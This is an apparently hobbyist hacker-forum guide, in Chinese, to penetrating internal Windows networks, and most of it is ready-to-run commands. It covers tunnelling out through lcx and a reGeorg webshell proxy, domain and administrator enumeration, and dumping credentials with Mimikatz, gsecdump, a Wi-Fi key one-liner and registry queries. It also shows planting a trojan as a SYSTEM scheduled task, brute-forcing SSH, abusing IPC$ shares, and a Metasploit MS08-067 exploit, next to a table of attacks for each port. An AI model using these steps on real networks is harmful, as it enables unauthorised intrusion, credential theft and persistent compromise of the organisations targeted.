内网渗透+基础+工具使用=自己理解 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

内网渗透+基础+工具使用=自己理解

无法 动画教程

目录

1.代理

2.内网命令

3.抓密码

4.ipc$共享目录利用

5.端口漏洞

6.溢出

1.代理

端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等……..

下面介绍我比较喜欢的2款工具LCX+ socks5

1.lcx

路由器加端口 TCP协议 ,固定IP地址本机

大马设置

Local Ip : 转发ip

Local Port : 转发端口

Remote Ip :本机ip (ip138.com外网ip)

Remote Port : 路由器上面设置的端口

Lcx上面执行:

lcx.exe  -listen 3839 38390

 

2.reGeorg + proxifier

SOCKS:下载地址: https://github.com/sensepost/reGeorg

配置文件

Vim /etc/proxychains.conf

添加socks5 127.0.0.1 8090 (端口和监听端口要一样

使用方法:

python reGeorgSocksProxy.py -u http://xxx.com/sk5.php -p 8090

上传一个脚本(asp,php,jsp,ashx)到webshell上

这些reGeorgSocksProxy.py脚本,监听shell端口

Win下面使用proxifier连接

配置文件-代理服务

Ip地址设置kali本机ip

2.内网常用的命令

ipconfig /all

查询ip判断有没有域服务,ps:大型网络一般都有dns服务器域。

net view /domain,我们可以知道有1个域。

Net view

查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来

可以参考以下是经用的内网渗透命令:

net group /domain                        //获得所有域用户组列表 
net group qq_group /domain               //显示域中qq_group组的成员 
net group qq_group /del /domain          //删除域中qq_group组
net group qq_group qq /del /domain       //删除域内qq_group 群组中的成员QQ
net group qq_group /add /domain          //增加域中的群组
net group "domain admins"  /domain       //获得域管理员列表
net group "enterprise admins" /domain    //获得企业管理员列表
net localgroup administrators /domain    //获取域内置administrators组用(enterprise admins、domain admins)
net group "domain controllers"  /domain   //获得域控制器列表
net group "domain computers"  /domain    //获得所有域成员计算机列表
net user /domain                        //获得所有域用户列表
net user someuser /domain              //获得指定账户someuser的详细信息
net accounts /domain                //获得域密码策略设置,密码长短,错误锁定等信息
nei view /domain                   //查询有几个域, 查询域列表
net view /domain:testdomain       //查看 testdomain域中的计算机列表
nltest /domain_trusts              //获取域信任信息
net user domain-admin /domain      //查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息
net config Workstation         //查询机器属于哪个域
net time /domian               //查询主域服务器的时间
echo %logonserver%              //查看登陆到这台服务器的计算机名
net time  \\192.168.1.1         //查询远程共享主机192.168.1.1的时间
net use \\IP\ipc$ password /user:username@domain     //ipc$域内连接
net  view  \\dc2.backlion.com         //查看域控共享情况
dir \\dc2.backlion.com\SYSVOL /s /a > sysvol.txt  //列出sysvol日志记录
xcopy \\dc2.backlion.com\sysvol.txt  sysvol.txt  /i  /e  /c //远程拷贝到本地sysvol日志
net user  /domain  bk  bk123                 //修改域内用户密码,需要管理员权限
net  localgroup  administartors   SEZKL\backlion  /add      //将SEZKL域中的用户backlion添加到administrators组中
mstsc /admin                 //远程桌面登录到console会话解决hash无法抓出问题
gpupdate/force                  //更新域策略
psexec  \\192.168.1.3  -u  administrator  -p  bk1234  -c  gsecdump.exe  -u
  //从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来
gsecdump  -a        //获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值
tasklist /S ip /U domain\username /P /V     //查看远程计算机进程列 

基本内网渗透命令:

ipconfig/all    //查看IP地址
ipconfig /release  //释放地址
ipconfig /renew 重新获取Ip地址
whoami    //查询账号所属权限
whoami/all  //查看sid值
systeminfo  //查询系统以及补丁信息
tasklist /svc   //查看进程
taskkill /im 进程名称(cmd)  //结束进程
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
wmic qfe  get hotfixid    //查看已安装过得补丁,这个很实用
wmic qfe list full /format:htable > hotfixes.htm  //详细的补丁安装
wmic  qfe      //查询补丁信息以及微软提供的下载地址
ping hostname(主机名)   //显示该机器名的IP 
net start   //查看当前运行的服务
net user      //查看本地组的用户
net localhroup administrators   //查看本机管理员组有哪些用户
net use      //查看会话
net session     //查看当前会话
net share       //查看SMB指向的路径[即共享]
wmic share get name,path   //查看SMB指向的路径
wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置
net use \\IP\ipc$  password  /user:username      //建立IPC会话(工作组模式)
net use  z:  \\192.168.1.1      //建立映射到本机Z盘
net time \\172.16.16.2        //查询共享主机的是
at \\172.16.16.2 13:50 c:\windows\2009.exe      //在共享主机上执行
netstat  -ano      //查看开放的端口
netstat -an | find “3389”   //找到3389端口
net accounts      //查看本地密码策略
nbtstat –A ip      //netbiso查询
net view      //查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来
echo %PROCESSOR_ARCHITECTURE%         //查看系统是32还是64位  
set                              //查看系统环境设置变量
net start                     //查看当前运行的服务
wmic service list brief              //查看进程服务
wmic process list brief         //查看进程
wmic startup list brief       //查看启动程序信息
wmic product list brief            //查看安装程序和版本信息(漏洞利用线索)
wmic startup list full         //识别开机启动的程序
wmic process where(description="mysqld.exe") >> mysql.log  //获取软件安装路径

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
 //一键获取wifi密码

 if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) 
//查看是否支持posershell

qwinsta                       //查看登录情况

schtasks.exe  /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex    e" /ED 2017/4/7  //添加计划任务


set KB2829361=MS13-046&set KB2830290=MS13-046&set KB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&set KB3077657=MS15-077&set KB3045171=MS15-051&set KB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&set KB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280) do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f /q /a a.txt
 //windows未打补丁情况

 REG query HKCU  /v "pwd" /s  //获取保存到注册表中的密码 

内网网络结构用的命令:

tracert IP    //路由跟踪
route print    //打印路由表
arp -a          //列出本网段内所有活跃的IP地址
arp -s (ip + mac)//绑定mac与ip地址
arp -d (ip + mac) //解绑mac与ip地址
nbtscan -r 192.168.16.0/24      //通过小工具nbtscan扫描整个网络
netsh firewall show config     //查看防火墙策略
netsh firewall show state     //查看防火墙策略
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"   //批量扫描内网存活主机

windows自带端口转发:
netsh interface ipv6 install  //首先安装IPV6(xp、2003下IPV6必须安装,否则端口转发不可用!)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22 connectaddress=1.1.1.1 connectport=22  //将本机22到1.1.1.1的22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1 listenport=22 connectaddress=8.8.8.8 connectport=22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1 listenport=22 connectaddress=www.baidu.com connectport=22
netsh interface portproxy show all // 查看转发配置
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=22 //删除配置
netsh firewall set portopening protocol=tcp port=22 name=Forward mode=enable scope=all profile=all  //添加防火墙规则,允许连接22: 

敏感数据和目录:

dir /b/s config.*              //查看所在目录所有config.为前缀的文件
findstr /si password *.xml *.ini *.txt     //查看后缀名文件中含有password关键字的文件
findstr /si login *.xml *.ini *.txt     //查看后缀名文件中含有login关键字的文件
copy con 创建命令:
copy con  ftp.bat     //创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功
copy con  test.vbs    //创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功 

dsquery的AD查询工具:

dsquery user domainroot -limit 65535 && net user /domain    //列出该域内所有用户名
dsquery server -domain super.com | dsget server -dnsname -site    //搜索域内所有域控制器并显示他们的DNS主机名和站点名称
dsquery contact    //寻找目录中的联系人
dsquery subnet     //列出该域内网段划分
query user             //查询那些用户在线
dsquery group && net group /domain     //列出该域内分组
dsquery ou                              //列出该域内组织单位
dsquery server && net time /domain      //列出该域内域控制器
dsquery site -o rdn                  //搜索域中所有站点的名称
dsquery group dc=super,dc=com |more    //搜索在DC=SUPER,DC=COM 域中的所有组
psloggedon.exe                        //查询那台主机和用户登录到该主机上
netsess.exe   //192.168.1.115         //远程主机上无需管理员权限,查询到主机名和用户
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\DEFAULT" //获取最近mstsc登录的记录 

DOS常用快捷命令

mspaint  画图工具
calc  计算机
notepad  记事本
taskmgr  任务管理器
osk  打开屏幕键盘
gpedit.msc  组策略
services.msc  本地服务
compmgmt.msc  计算机管理
devmgmt.msc  设备管理器
winver  查看系统版本
magnify  放大镜实用程序
eventvwr  事件查看器
Regedit  打开注册表
resmon  资源监视器
WMIC BIOS get releasedate  查看电脑生产日期
mstsc -f  远程连接(可以全屏)

3. 抓密码

Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

第一条:privilege::debug      //提升权限

第二条:sekurlsa::logonpasswords           //抓取密码

记录 Mimikatz输出:

第一条:””privilege::debug”” “”log sekurlsa::logonpasswords full”” exit && dir

将输出导入到本地文件:

第二条:””privilege::debug”” “”sekurlsa::logonpasswords full”” exit >> log.txt

SAMInside

这款工具有利有弊:

  1. 有时候抓不出密码,安全环境。(弊)
  2. 抓出的密码有时候破解网站破解不出SAMInside工具是跑密码表,一般都可以破解。

抓出来的密码可以使用爆破工具扫描。。。。。PS(首先要知道里面有流量监控,防火墙?)

推荐使用:

Linux  metasploit

use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块

set RHOSTS 192.168.1.105  扫描的ip地址

set USERNAME root  扫描的用户名为root

set PASS_FILE/root/password.txt   设置字典

set THREADS 20   设置线程根据实际情况设置

show options    查看设置信息

run    开始扫描

win推荐使用ntscan扫描速度非常快

4.ipc$共享目录

使用命令 net use url=file://\\IP\ipc$\\IP\ipc$ “” /user:”” 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。(来源百度)

利用工具 流光,DTools 的IPC$探测功能,可进行扫描(ps:建议摸清楚内网有没有监控)

或者使用 \\可以查询管理员链接过那一台服务器

\\192.168.0.77

\\192.168.0.77\c$ (进入c盘)

或者网络处查看

Ps:(真实案例)

我通过tomcat拿到了一台服务器,但是那一台服务器密码不通杀,我什么扫描192.168.x.x所有网站,只扫描出几个都是一些路由器,tomcat(没有弱口令),我通过tomcat的一台共享ipc$拿下的服务器。

5.端口漏洞

端口号 端口说明 攻击技巧
21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门
22 ssh:远程连接 爆破OpenSSH;28个退格
23 telnet:远程连接 爆破\嗅探
25 smtp:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 dhcp 劫持\欺骗
110 pop3 爆破
139 samba 爆破\未授权访问\远程代码执行
143 imap 爆破
161 snmp 爆破
389 ldap 注入攻击\未授权访问
512/513/514 linux r 直接使用rlogin
873 rsync 未授权访问
1080 socket 爆破:进行内网渗透
1352 lotus 爆破:弱口令\信息泄漏:源代码
1433 mssql 爆破:使用系统用户登录\注入攻击
1521 oracle 爆破:TNS\注入攻击
2049 nfs 配置不当
2181 zookeeper 未授权访问
3306 mysql 爆破\拒绝服务\注入
3389 rdp 爆破\Shift后门
4848 glassfish 爆破:控制台弱口令\认证绕过
5000 sybase/DB2 爆破\注入
5432 postgresql 缓冲区溢出\注入攻击\爆破:弱口令
5632 pcanywhere 拒绝服务\代码执行
5900 vnc 爆破:弱口令\认证绕过
6379 redis 未授权访问\爆破:弱口令
7001 weblogic Java反序列化\控制台弱口令\控制台部署webshell
80/443/8080 web 常见web攻击\控制台爆破\对应服务器版本漏洞
8069 zabbix 远程命令执行
9090 websphere控制台 爆破:控制台弱口令\Java反序列
9200/9300 elasticsearch 远程代码执行
11211 memcacache 未授权访问
27017 mongodb 爆破\未授权访问

转网络

6.溢出

当通过VPN进入内网web搞不定,可以试试系统漏洞,内网补丁很少的情况下可以试试远程溢出。

推荐2个exp网站:

https://www.exploit-db.com/
https://www.kernel-exploits.com/
扫描漏洞我们可以通过nmap或者Nessus扫描内网漏洞,推荐使用nmap,Nessus扫描动静太大容易发现。

案例:仅供参考(ps:这个是好久以前搞的一台内网)

使用Metasploit

use exploit/windows/smb/ms08_067_netapi  加载漏洞模块

set LHOST  本机IP

set RHOST   目标ip

set payload windows/shell_bind_tcp        payload

show options  看看有没有什么设置错误的地方。

Exploit   攻击

标签: 内网渗透

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表